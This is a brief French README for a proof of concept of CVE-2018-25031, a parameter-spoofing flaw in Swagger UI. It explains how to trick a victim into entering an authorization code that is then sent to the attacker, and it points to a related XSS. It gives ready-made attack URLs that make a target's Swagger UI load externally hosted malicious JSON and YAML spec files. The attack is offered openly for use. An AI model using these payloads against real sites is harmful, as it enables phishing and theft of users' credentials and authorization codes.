
Un simple POC (CVE-2018-25031
Un simple POC (CVE-2018-25031) qui amène la victime à saisir le code d'autorisation, lequel est ensuite envoyé à l'attaquant.
Vous pouvez l'utiliser avec la vulnérabilité XSS https://github.com/VictorNS69/swagger-ui-xss
Il est nécessaire de trouver le paramètre et d'assigner le bon fichier : pour configUrl, le fichier JSON, et pour url, le fichier YAML.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031